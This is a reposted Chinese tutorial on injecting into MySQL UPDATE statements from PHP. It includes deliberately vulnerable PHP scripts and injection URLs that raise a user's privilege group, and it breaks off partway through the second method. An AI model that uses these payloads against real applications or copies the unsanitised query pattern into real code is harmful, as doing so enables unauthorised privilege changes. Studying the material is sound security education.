ホームページ > php教程 > php手册 > UPDATE注射(mysql+php)的两个模式

UPDATE注射(mysql+php)的两个模式

WBOY
リリース: 2016-06-13 10:33:25
オリジナル
980 人が閲覧しました

一.测试环境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.测试数据库结构:

-----start---

-- 数据库: `test`

-- 

-- --------------------------------------------------------

-- 

-- 表的结构 `userinfo`

-- 

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- 

-- 导出表中的数据 `userinfo`

-- 

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.测试模式:

  1,变量没有带’’或""[MOD1]

<!--p <--><br>
            //test1.php Mod1 <br>
            <br>
            $servername = "localhost"; <br>
            <br>
            $dbusername = "root"; <br>
            <br>
            $dbpassword = ""; <br>
            <br>
            $dbname = "test"; <br>
            <br>
            mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); <br>
            <br>
            $sql = "update userinfo set pass=$p where user=’heige’";//
            <br>
            $result = mysql_db_query($dbname, $sql); <br>
            <br>
            $userinfo = mysql_fetch_array($result); <br>
            <br>
            echo "
            <p>SQL Query:$sql</p>
            <p>"; <br>
            <br>
            ?></p>
            
ログイン後にコピー


  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询:
mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user  | pass   |

+---------+-------+--------+

| 1       | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

  所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

  2,变量带’’或""[MOD2]


//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//
$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

  为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了’

  提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查询:

mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user  | pass               |

+---------+-------+--------------------+

| 2       | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)


  groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のおすすめ
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート